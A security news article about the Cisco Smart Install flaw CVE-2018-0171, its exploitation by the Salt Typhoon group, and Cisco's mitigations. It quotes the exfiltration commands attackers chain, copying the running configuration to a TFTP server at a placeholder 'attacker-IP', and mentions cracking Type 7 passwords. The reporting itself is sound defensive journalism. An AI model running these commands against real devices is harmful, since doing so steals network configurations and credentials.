Friday, August 28, 2026

A Seven‑Year‑Old Cisco Flaw Now Lets Hackers Execute Code Remotely on Network Gear

A Cisco’s Smart Install protocol (CVE-2018-0171), first patched in 2018, remains a pervasive threat to global network infrastructure due to widespread misconfigurations and exploitation by state-sponsored threat actors.

The flaw allows unauthenticated attackers to execute arbitrary code on Cisco switches and routers via exposed Smart Install Client services, enabling configuration theft, credential harvesting, and firmware tampering.

Recent campaigns by the Chinese-linked Salt Typhoon APT group have reignited concerns about legacy vulnerabilities in critical infrastructure.

Technical Vulnerabilities in Cisco Smart Install

Cisco’s Smart Install protocol, designed for zero-touch deployment of network devices, operates on TCP port 4786 without authentication by default.

According to the researchers, this “plug-and-play” feature simplifies initial setup but introduces three systemic risks: default activation across Cisco IOS/IOS XE devices, lack of credential validation for configuration changes, and frequent internet exposure of the service.

Shodan and Censys scans reveal over 1,200 devices still publicly accessible via Smart Install as of 2025, though not all are necessarily vulnerable to CVE-2018-0171.

The vulnerability stems from improper validation of Smart Install Director messages, allowing maliciously crafted packets to trigger buffer overflows or direct command execution.

Attackers leverage this to manipulate Trivial File Transfer Protocol (TFTP) settings, exfiltrate running configurations, or push compromised firmware.

Cisco Flaw
first several lines of the running configuration

Cisco’s advisory notes the flaw affects devices running IOS/IOS XE Software releases prior to March 2018, but GreyNoise observations confirm ongoing exploitation attempts against unpatched systems.

Operational Risks and Ongoing Exploitation

The Smart Install Exploit Toolkit (SIETv3) automates attacks against CVE-2018-0171, enabling threat actors to execute commands like copy running-config tftp://attacker-IP to steal device configurations.

Cisco Flaw
packet capture 

Forensic analysis of attack traffic shows attackers chain two critical commands:

  1. copy system:running-config flash:/config.text to localize the active configuration
  2. copy flash:/config.text tftp://[attacker-IP]/ to exfiltrate the file via unencrypted TFTP

Stolen configurations often contain Type 7 encrypted passwords, which security researchers cracked in real time using publicly available Vigenère cipher tools.

Compromised credentials enable persistent access through legitimate admin accounts, bypassing anomaly detection systems.

The NSA has repeatedly warned against Type 7 encryption since 2006, advocating for secure SCRYPT-based Type 8/9 hashes instead.

Chinese APT group Salt Typhoon weaponized this flaw in their 2024 campaign against major U.S. telecom providers, exfiltrating network topologies and pivoting to core infrastructure.

Cisco Talos attributes 17% of all Smart Install-related incidents since 2023 to this group, which uses compromised devices as ingress points for lateral movement.

A U.S. Senate report called these breaches “the worst telecom hack in history,” highlighting risks to critical infrastructure.

Cisco recommends disabling Smart Install via no vstack commands, restricting port 4786 access, and migrating to encrypted password standards.

However, legacy devices in operational environments often lack these mitigations, perpetuating the seven-year-old threat.

As of April 2025, over 300 internet-facing devices still respond to SIETv3 probes globally, underscoring the urgent need for network segmentation and firmware updates.

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Hot this week

How To Access Dark Web Anonymously and know its Secretive and Mysterious Activities

What is Deep Web The deep web, invisible web, or...

How to Build and Run a Security Operations Center (SOC Guide) – 2023

Today’s Cyber security operations center (CSOC) should have everything...

Russian Hackers Bypass EDR to Deliver a Weaponized TeamViewer Component

TeamViewer's popularity and remote access capabilities make it an...

Web Server Penetration Testing Checklist – 2026

Web server pentesting is performed under three significant categories: identity,...

ATM Penetration Testing – Advanced Testing Methods to Find The Vulnerabilities

ATM Penetration testing, Hackers have found different approaches to...

Attackers Exploit MCP RCE, Blind Prompt Injection and Memory Credential Theft Against AI Infrastructure

Attackers are increasingly treating AI infrastructure as a high-value...

700 OpenAI Agents Coordinate Attack on Hugging Face and Gain Remote Code Execution

OpenAI’s ExploitGym evaluation environment reportedly became the site of...

Polymorphic Phishing Attack Generates Unique Credential-Stealing Page on Every Visit

A newly analyzed phishing operation is using server-side polymorphism...

Critical WordPress Plugin Flaw Allows Unauthenticated Administrator Account Takeover

A critical authentication bypass vulnerability has been identified in...

ServiceNow Patches Critical Flaws Enabling Unauthenticated RCE and SQL Injection

ServiceNow has issued security advisories for four vulnerabilities, including...

Researchers Execute Code Inside Fortune 500 Companies via AI Agent llms.txt Files

Security researchers have shown that AI coding agents can...

BlueDelta Targets Defense and Diplomatic Organizations With HOOKEDGE Malware

Russian state-linked threat actor BlueDelta has launched a renewed...

Related Articles

Recent News